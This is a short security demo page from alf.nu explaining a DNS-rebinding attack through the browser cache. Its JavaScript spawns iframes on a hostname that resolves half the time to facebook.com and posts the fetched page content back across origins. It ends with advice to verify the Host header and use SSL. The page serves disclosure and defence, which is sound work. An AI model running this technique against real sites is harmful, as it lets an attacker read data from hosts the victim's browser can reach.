alf.nu alf.nu / @steike

Browser cache + DNS rebinding

Alok's DNS rebinding via browser cache

Browsers protect against DNS rebinding by caching DNS entries for the entire browser session. even if the time-to-live sent by the server is short.

This demo attempts to steal a (harmless) HTML file from facebook.com.

You need to visit this page twice; try closing your browser and opening it again.

Frames
Output
Script

// This is the script that will run inside each frame. It justs fetches a file from its own host and posts the result back.

function framescript() {
  var x = new XMLHttpRequest();
  x.open('GET', '/js/blank.html?:CC=max-age=0&raw=try_again');
  x.onload = function() { parent.postMessage(x.responseText, '*'); };
  x.send();
}

window.onmessage = function(e) {
  // If we hit ourselves, the result is not interesting; ignore it.
  if (/try_again/.test(e.data)) return;
  document.getElementById('rightbox').textContent = e.data;
};

// Now create a bunch of frames. The host name will resolve to
// www.facebook.com 50% of the time and this server the rest of the time.
// If it hits this server, it will serve the script above with a long
// cache lifetime.

for (var i=0; i<20; i++) {
  var f = document.createElement('iframe');
  f.setAttribute('style', 'width:10px; height:10px; border:none');
  f.src = 'http://4s.'+i+'.c-www-facebook-com.but-50-pct.c-4i-am.4i.am' + 
          '/js/blank.html?:CC=max-age=86400&body[bgcolor=tan]&js=' + encodeURIComponent('!'+framescript+'()');
  document.getElementById('leftbox').appendChild(f);
}

(This uses the DNS thing and chargen to save some work)

Fix

Everything should verify the Host header. Everything. Also, SSL everywhere.

Complaints to @steike.